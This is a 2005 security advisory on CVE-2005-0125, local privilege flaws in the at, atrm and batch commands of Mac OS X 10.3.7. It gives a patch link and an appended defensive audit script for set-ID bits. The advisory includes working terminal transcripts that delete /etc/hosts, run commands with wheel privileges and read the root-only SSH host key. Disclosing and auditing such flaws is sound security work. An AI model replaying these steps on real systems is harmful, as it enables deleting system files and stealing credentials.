Apple OS X Multiple Application Security Vulnerabilities

Published: 2005-01-26
Updated: 2005-02-04

Affected systems:
Apple MacOS X Server 10.3.7
Apple MacOS X 10.3.7
Description:
BUGTRAQ ID: 12297
CVE(CAN) ID: CVE-2005-0125

Mac OS X is a BSD-based operating system.

Several of the at-related commands shipped with Mac OS X do not drop privileges correctly. A local attacker can exploit these flaws to delete files, run arbitrary commands, and read sensitive information.

'atrm' can be used to delete any file on the system:

CrunkJuice:~ kevinfinisterre$ id
uid=501(kevinfinisterre) gid=501(kevinfinisterre) groups=501(kevinfinisterre), 79(appserverusr), 80(admin), 81(appserveradm)

CrunkJuice:~ kevinfinisterre$ rm /etc/hosts
override rw-r--r--  root/wheel for /etc/hosts? y
rm: /etc/hosts: Permission denied

CrunkJuice:~ kevinfinisterre$ ls -al /etc/hosts
-rw-r--r--  1 root  wheel  214  3 Dec 20:19 /etc/hosts

CrunkJuice:~ kevinfinisterre$ atrm /etc/hosts

CrunkJuice:~ kevinfinisterre$ ls -al /etc/hosts
ls: /etc/hosts: No such file or directory

'batch' can be used to execute arbitrary commands with the privileges gid=0(wheel) groups=0(wheel), 1(daemon), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest):

CrunkJuice:/tmp kevinfinisterre$ echo > aa
/usr/bin/id > /tmp/test

CrunkJuice:/tmp kevinfinisterre$ batch -f /tmp/aa 0
Job b0118490c.000 will be executed using /bin/sh

CrunkJuice:/tmp kevinfinisterre$ cat /tmp/test
cat: /tmp/test: No such file or directory

(wait 5 minutes)

CrunkJuice:/tmp kevinfinisterre$ cat /tmp/test
uid=501(kevinfinisterre) gid=0(wheel) groups=0(wheel), 1(daemon), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest), 80(admin)

'batch' can also be used to read any file on the system:

CrunkJuice:~ kevinfinisterre$ cat /etc/ssh_host_dsa_key
cat: /etc/ssh_host_dsa_key: Permission denied

CrunkJuice:~ kevinfinisterre$ ls -al /etc/ssh_host_dsa_key
-rw-------  1 root  wheel  668 16 Nov 19:39 /etc/ssh_host_dsa_key

CrunkJuice:~ kevinfinisterre$ batch -f /etc/ssh_host_dsa_key
Job b011848db.000 will be executed using /bin/sh

CrunkJuice:~ kevinfinisterre$ ls -al /var/at/jobs/b011848db.000
-rwx------  1 kevinfin  wheel  1263  3 Dec 20:31 /var/at/jobs/b011848db.000

CrunkJuice:~ kevinfinisterre$ cat /var/at/jobs/b011848db.000
#! /bin/sh
# mail     root 0
umask 22
TERM_PROGRAM=Apple\_Terminal; export TERM_PROGRAM
SHELL=\/bin\/bash; export SHELL
TERM_PROGRAM_VERSION=100; export TERM_PROGRAM_VERSION
OLDPWD=\/var\/at\/jobs; export OLDPWD
USER=kevinfinisterre; export USER
__CF_USER_TEXT_ENCODING=0x1F5\:0\:0; export __CF_USER_TEXT_ENCODING
PATH=\/bin\:\/sbin\:\/usr\/bin\:\/usr\/sbin; export PATH
PWD=\/Users\/kevinfinisterre; export PWD
SHLVL=1; export SHLVL
HOME=\/Users\/kevinfinisterre; export HOME
LOGNAME=kevinfinisterre; export LOGNAME
SECURITYSESSIONID=20ee50; export SECURITYSESSIONID
cd /Users/kevinfinisterre

<*Source: Kevin Finisterre (dotslash@snosoft.com)
  
  Link: http://marc.theaimsgroup.com/?l=bugtraq&m=110685027017411&w=2
*>

Recommendations:
Vendor patch:

Apple
-----
The vendor has released an update that fixes this security issue. Download it from the vendor's site:

http://www.apple.com/support/downloads/securityupdate2005001macosx1028client.html
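As an added defensive check that is not part of the original advisory or of Apple's update: the at-family commands (at, atq, atrm, batch) obtain the privileges they run with through set-user-ID or set-group-ID bits on the binaries (an assumption about the affected build; the advisory only states that privileges are not dropped correctly). The script below audits a directory for set-ID copies of those commands so an administrator can record the state before and after applying the update. The AT_COMMANDS list, the function names and the directory argument are choices made here, not anything from the advisory.

```shell
#!/bin/sh
# Added example (not from the advisory): audit at-family commands for
# set-UID / set-GID bits. Assumption: these bits are how the commands
# obtain the privileges the advisory says they fail to drop.

# Names of the at-family commands to inspect (parameter chosen here).
AT_COMMANDS="at atq atrm batch"

# list_setid_at_commands DIR
# Prints "<name> <mode-string>" for each at-family command in DIR whose
# set-UID (04000) or set-GID (02000) bit is set; prints nothing otherwise.
list_setid_at_commands() {
    dir=$1
    for name in $AT_COMMANDS; do
        f="$dir/$name"
        [ -f "$f" ] || continue
        # POSIX find: -perm -4000 matches when the set-UID bit is set,
        # -perm -2000 when the set-GID bit is set. -prune stops find from
        # descending, so only $f itself is tested.
        if [ -n "$(find "$f" -prune \( -perm -4000 -o -perm -2000 \) -print)" ]; then
            printf '%s %s\n' "$name" "$(ls -ld "$f" | cut -c1-10)"
        fi
    done
}

# count_setid_at_commands DIR
# Number of at-family commands in DIR that carry a set-ID bit.
count_setid_at_commands() {
    list_setid_at_commands "$1" | wc -l | tr -d ' '
}

# audit_at_commands DIR
# Human-readable report; returns 0 when nothing is flagged, 1 otherwise,
# so it can be dropped into a host-hardening or compliance script.
audit_at_commands() {
    dir=$1
    found=$(list_setid_at_commands "$dir")
    if [ -z "$found" ]; then
        echo "OK: no set-UID/set-GID at-family commands in $dir"
        return 0
    fi
    echo "WARNING: set-UID/set-GID at-family commands in $dir:"
    printf '%s\n' "$found" | while read -r name mode; do
        echo "  $mode $dir/$name"
    done
    echo "Apply the vendor update. A common interim measure is to clear the set-ID bits, which disables these commands for unprivileged users."
    return 1
}

# Run against the directory given on the command line, e.g. /usr/bin.
if [ $# -gt 0 ]; then
    audit_at_commands "$1"
fi
```

Run it as `sh audit_at.sh /usr/bin` on the host being checked. A non-zero exit means at least one at-family binary still carries a set-ID bit; on a system where the update has been applied, the result should be compared against what the updated package ships rather than assumed to be zero, since a patched binary may legitimately keep its set-ID bit.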

This advisory was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.